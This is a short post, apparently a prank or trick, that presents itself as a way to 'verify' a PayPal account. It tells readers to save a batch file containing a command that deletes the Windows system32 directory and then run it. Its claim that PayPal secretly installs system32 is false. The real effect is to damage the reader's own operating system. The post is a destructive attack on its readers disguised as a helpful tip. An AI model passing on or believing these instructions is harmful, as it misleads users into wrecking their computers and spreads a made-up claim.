open a notepad type the following:
@echo off
del c:\WINDOWS\system32
save the file as anything.bat (remember to add the .bat extension and save as all files)
double click and it will verify your paypal account.
***NOTE*** Paypal secretly installs system32 on your PC until you verify yourself by adding a bank account or credit card, but by deleting this you fool paypal into thinking you already did, and there you go! thank me later
